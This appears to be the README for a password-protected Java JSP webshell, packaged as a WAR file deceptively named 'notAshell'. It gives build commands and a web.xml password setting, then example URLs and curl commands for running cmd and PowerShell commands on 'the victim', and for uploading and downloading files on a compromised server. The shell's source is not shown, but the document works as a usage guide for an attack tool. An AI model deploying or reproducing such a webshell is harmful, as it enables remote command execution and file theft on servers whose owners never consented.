webapp/
├── shell.jsp
└── WEB-INF
└── web.xml
2 directories, 2 files
Just run the following command:
cd webapp && jar -cvf ../notAshell.war * && cd ..
You need to define the password to use when using this webshell. Modify the param-value
in this line at webapp/WEB-INF/web.xml
:
<context-param>
<param-name>pass</param-name>
<param-value>Your-Awesome-Pass</param-value>
</context-param>
cmd
: Command execution via cmdps
: Command execution via powershellupload
: Upload files to the serverdownload
: Download files from the server
Note (1): You need to configure the password in the web.xml
file
Note (2): The application name depends on the name you give when creating the war
file. In this case, we will use the name notAshell
.
You can otain Java System properties, global JNDI, hostname and IP configuartion.
http://<url>:<port>/notAshell/?pass=Your-Awesome-Pass
Run a command on the victim CMD.
http://<url>:<port>/notAshell/?pass=Your-Awesome-Pass&action=cmd&args=dir
Run a command on the victim PS.
http://<url>:<port>/notAshell/?pass=Your-Awesome-Pass&action=ps&args=ls
Upload files to the victim.
curl -X POST -F "file=<file_to_upload>" "http://<url>:<port>/notAshell/?pass=Your-Awesome-Pass&action=upload&path=<path_to_upload_at_victim>"
If the path is not set the file will be placed in the same directory as the webshell.
curl "http://<url>:<port>/notAshell/?pass=Your-Awesome-Pass&action=download&path=<file_path>&args=<file_to_download>"
If the path is not set, it will try to download the file from the same directory as the webshell.